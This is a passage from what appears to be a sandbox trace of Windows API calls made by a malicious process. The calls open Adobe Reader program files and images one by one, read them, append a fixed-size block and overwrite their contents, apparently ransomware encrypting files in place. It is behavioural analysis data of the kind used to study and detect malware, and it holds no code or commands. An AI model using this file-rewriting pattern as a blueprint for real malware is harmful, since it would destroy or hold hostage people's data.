lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x68263 [0092.628] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.628] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0092.628] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0092.629] CloseHandle (hObject=0x1e4) returned 1 [0092.629] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Updater.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\updater.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0092.630] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.630] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x29463 [0092.630] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0092.630] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.630] ReleaseMutex (hMutex=0x168) returned 1 [0092.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.api", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.api", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Updater.api", lpUsedDefaultChar=0x0) returned 11 [0095.605] ReadFile (in: hFile=0x1e4, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0095.633] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x28463 [0095.633] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0095.638] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x28463 [0095.639] WriteFile (in: hFile=0x1e4, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0095.639] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0095.639] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0095.640] CloseHandle (hObject=0x1e4) returned 1 [0095.640] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prcr.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prcr.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0095.641] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.641] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x301190 [0095.641] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.641] ReleaseMutex (hMutex=0x168) returned 1 [0095.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prcr.x3d", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prcr.x3d", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prcr.x3d", lpUsedDefaultChar=0x0) returned 8 [0095.641] ReadFile (in: hFile=0x1e4, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0095.644] ReadFile (in: hFile=0x1e4, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0095.646] ReadFile (in: hFile=0x1e4, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0095.646] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2ff190 [0095.647] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0095.652] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2ff190 [0095.653] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf28c*=0x2588, lpOverlapped=0x0) returned 1 [0095.654] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0095.654] WriteFile (in: hFile=0x1e4, lpBuffer=0x28eb7d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28eb7d8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0095.655] WriteFile (in: hFile=0x1e4, lpBuffer=0x28eb7d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28eb7d8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0095.655] WriteFile (in: hFile=0x1e4, lpBuffer=0x28eb7d8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28eb7d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x2000, lpOverlapped=0x0) returned 1 [0095.656] CloseHandle (hObject=0x1e4) returned 1 [0095.656] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\add_reviewer.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\add_reviewer.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0095.657] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.657] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x53a [0095.657] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.657] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.657] ReleaseMutex (hMutex=0x168) returned 1 [0095.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="add_reviewer.gif", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="add_reviewer.gif", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="add_reviewer.gif", lpUsedDefaultChar=0x0) returned 16 [0095.658] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f3de48, nNumberOfBytesToRead=0x53a, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3de48*, lpNumberOfBytesRead=0x2fdf2bc*=0x53a, lpOverlapped=0x0) returned 1 [0095.662] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0095.662] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0xac2, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf2d0*=0xac2, lpOverlapped=0x0) returned 1 [0095.662] CloseHandle (hObject=0x1e4) returned 1 [0095.662] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\end_review.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\end_review.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0095.663] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.663] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x384 [0095.663] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.663] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.663] ReleaseMutex (hMutex=0x168) returned 1 [0095.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="end_review.gif", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="end_review.gif", cchWideChar=14, lpMultiByteStr=0x1f7340c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="end_review.gif", lpUsedDefaultChar=0x0) returned 14 [0095.664] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x384, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x2fdf2bc*=0x384, lpOverlapped=0x0) returned 1 [0095.665] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0095.665] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x90c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x90c, lpOverlapped=0x0) returned 1 [0095.666] CloseHandle (hObject=0x1e4) returned 1 [0095.666] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\pdf.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\pdf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0095.667] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.667] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1e0 [0095.667] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.667] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.667] ReleaseMutex (hMutex=0x168) returned 1 [0095.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pdf.gif", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0095.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pdf.gif", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pdf.gif", lpUsedDefaultChar=0x0) returned 7 [0095.667] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1e0, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1e0, lpOverlapped=0x0) returned 1 [0095.669] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0095.669] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x768, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x768, lpOverlapped=0x0) returned 1 [0095.669] CloseHandle (hObject=0x1e4) returned 1 [0095.670] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_shared.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_shared.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0095.670] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.670] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x555 [0095.670] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.670] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.671] ReleaseMutex (hMutex=0x168) returned 1 [0095.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="review_shared.gif", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="review_shared.gif", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="review_shared.gif", lpUsedDefaultChar=0x0) returned 17 [0095.671] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x555, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2fdf2bc*=0x555, lpOverlapped=0x0) returned 1 [0095.673] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0095.673] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0xadd, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf2d0*=0xadd, lpOverlapped=0x0) returned 1 [0095.673] CloseHandle (hObject=0x1e4) returned 1 [0095.673] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tr.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tr.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0095.674] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.674] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x55 [0095.674] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0095.674] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0095.674] ReleaseMutex (hMutex=0x168) returned 1 [0095.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tr.gif", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0095.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tr.gif", cchWideChar=6, lpMultiByteStr=0x1f7ac0c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tr.gif", lpUsedDefaultChar=0x0) returned 6 [0095.674] ReadFile (in: hFile=0x1e4, lpBuffer=0x1fbb118, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbb118*, lpNumberOfBytesRead=0x2fdf2bc*=0x55, lpOverlapped=0x0) returned 1 [0095.676] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0095.676] WriteFile (in: hFile=0x1e4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0095.676] CloseHandle (hObject=0x1e4) returned 1 [0095.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0096.457] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.458] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4176 [0096.458] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.458] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.458] ReleaseMutex (hMutex=0x168) returned 1 [0096.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMe.htm", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMe.htm", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMe.htm", lpUsedDefaultChar=0x0) returned 10 [0096.458] ReadFile (in: hFile=0x1f8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0096.460] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3176 [0096.460] ReadFile (in: hFile=0x1f8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0096.461] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3176 [0096.461] WriteFile (in: hFile=0x1f8, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.461] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0096.461] WriteFile (in: hFile=0x1f8, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.461] CloseHandle (hObject=0x1f8) returned 1 [0096.461] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0096.462] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.462] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4444 [0096.462] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.462] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.462] ReleaseMutex (hMutex=0x168) returned 1 [0096.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMePOL.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMePOL.htm", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMePOL.htm", lpUsedDefaultChar=0x0) returned 13 [0096.463] ReadFile (in: 